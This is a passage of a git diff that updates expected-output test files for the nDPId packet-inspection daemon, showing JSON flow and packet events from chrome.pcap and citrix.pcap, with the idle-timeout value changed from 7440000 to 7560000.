{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509272,"flow_last_seen":1620902509272,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509272,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620902509272,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509272,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuYAbvjd2YSAAAAALAC\/\/+WlQAAAgQFtAEDAwUBAQgKM3SXeAAAAAAEAgAA"} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509273,"flow_last_seen":1620902509273,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509273,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1620902509273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509273,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuZAbt3hYKuAAAAALAC\/\/\/l6gAAAgQFtAEDAwUBAQgKM3SXeAAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509274,"flow_last_seen":1620902509274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509274,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1620902509274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509274,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuaAbt39JnFAAAAALAC\/\/\/OYgAAAgQFtAEDAwUBAQgKM3SXeQAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509276,"flow_last_seen":1620902509276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509276,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1620902509276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509276,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvubAbvm4fjEAAAAALAC\/\/8AcwAAAgQFtAEDAwUBAQgKM3SXewAAAAAEAgAA"} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1620902509302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509302,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5l1X2J5d4WCr6AS\/ojLGgAAAgQFrAQCCAo6mxrNM3SXeAEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuZAbt3hYKvdV9ieoAQECzoIAAAAQEICjN0l5M6mxrN"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620902509302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509302,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5gJQMJ043dmE6AS\/oiH6wAAAgQFrAQCCAo6mxrLM3SXeAEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuYAbvjd2YTCUDCdYAQECyk8QAAAQEICjN0l5M6mxrL"} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1620902509302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509302,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5p\/iAsOd\/SZxqAS\/ogA1gAAAgQFrAQCCAo6mxrMM3SXeQEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuaAbt39JnGf4gLD4AQECwd3QAAAQEICjN0l5M6mxrM"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620902509303,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509303,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5sh1fPg5uH4xaAS\/oinwwAAAgQFrAQCCAo6mxrPM3SXewEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620902509303,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509303,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvubAbvm4fjFIdXz4YAQECzEywAAAQEICjN0l5Q6mxrP"} 
+00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509273,"flow_last_seen":1620902509303,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509272,"flow_last_seen":1620902509303,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509274,"flow_last_seen":1620902509304,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509276,"flow_last_seen":1620902509304,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509273,"flow_last_seen":1620902509333,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509333,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509272,"flow_last_seen":1620902509335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509335,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":136,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509276,"flow_last_seen":1620902509338,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509338,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509274,"flow_last_seen":1620902509342,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509342,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1620902507870,"flow_last_seen":1620902514626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":687973,"flow_avg_l4_payload_len":798,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1134,"flow_first_seen":1620902508740,"flow_last_seen":1620902515037,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":930115,"flow_avg_l4_payload_len":820,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":376,"flow_first_seen":1620902509272,"flow_last_seen":1620902515049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":297726,"flow_avg_l4_payload_len":791,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":956,"flow_first_seen":1620902509273,"flow_last_seen":1620902515019,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":773272,"flow_avg_l4_payload_len":808,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1106,"flow_first_seen":1620902509274,"flow_last_seen":1620902515040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":914291,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1199,"flow_first_seen":1620902509276,"flow_last_seen":1620902515049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1009870,"flow_avg_l4_payload_len":842,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","packets-captured":5633,"packets-processed":5633,"total-skipped-flows":0,"total-l4-data-len":4613247,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":6,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":45,"global_ts_msec":1620902515049} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5633/5633 diff --git a/test/results/citrix.pcap.out b/test/results/citrix.pcap.out index 170608d70..b1d24ffac 100644 --- a/test/results/citrix.pcap.out +++ b/test/results/citrix.pcap.out 
@@ -1,10 +1,10 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"citrix.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} -00530{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":0,"flow_last_seen":0,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":0,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":0,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":24,"thread_ts_msec":0,"pkt":"4F+5aekiABUXp3WjCABFAAAsrYMAAIAGYjoVAAAIFgAAB7CpBdYP1me4AAAAAGACgAC\/CQAAAgQFtAAA6CmQmA=="} -00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":2,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":24,"thread_ts_msec":2,"pkt":"ABUXp3Wj4F+5aekiCABFAAAsrVIAAH4GZGsWAAAHFQAACAXWsKkP1nFlD9ZnuWASgAA9vQAAAgQFtAAA3WOanQ=="} 
-00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":2,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":20,"thread_ts_msec":2,"pkt":"4F+5aekiABUXp3WjCABFAAAorYQAAIAGYj0VAAAIFgAAB7CpBdYP1me5D9ZxZlAQgABVegAAAAAAAAAAIuNIFQ=="} -00591{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":2,"flow_last_seen":8,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":8,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} -00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":2,"flow_last_seen":1605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":855,"flow_tot_l4_payload_len":5490,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1605,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} 
+00530{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":0,"flow_last_seen":0,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":0,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":0,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":24,"thread_ts_msec":0,"pkt":"4F+5aekiABUXp3WjCABFAAAsrYMAAIAGYjoVAAAIFgAAB7CpBdYP1me4AAAAAGACgAC\/CQAAAgQFtAAA6CmQmA=="} +00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":2,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":24,"thread_ts_msec":2,"pkt":"ABUXp3Wj4F+5aekiCABFAAAsrVIAAH4GZGsWAAAHFQAACAXWsKkP1nFlD9ZnuWASgAA9vQAAAgQFtAAA3WOanQ=="} 